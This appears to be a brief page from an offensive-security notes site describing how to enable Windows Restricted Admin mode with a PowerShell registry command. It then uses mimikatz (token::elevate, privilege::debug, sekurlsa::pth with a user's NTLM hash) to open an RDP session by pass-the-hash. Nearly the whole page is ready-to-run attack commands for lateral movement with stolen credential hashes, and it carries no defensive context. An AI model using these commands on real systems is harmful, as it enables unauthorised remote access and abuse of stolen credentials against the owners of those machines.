Enable Restricted Admin using powershell and use mimikatz for RDP

To enable restrcitedadmin using powershell run the following command.

New-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Lsa'  -Name 'DisableRestrictedAdmin' -Value 0 -PropertyType DWORD

Now you can use mimikatz as follows to get RDP session

token::elevate
privilege::debug
sekurlsa::pth /user:<user name> /domain:<domain name> /ntlm:<the user's ntlm hash> /run:"mstsc.exe /restrictedadmin /v:<IP of the system>"

PreviousPowerShell NextPowershell Custom Runspace

Last updated 3 years ago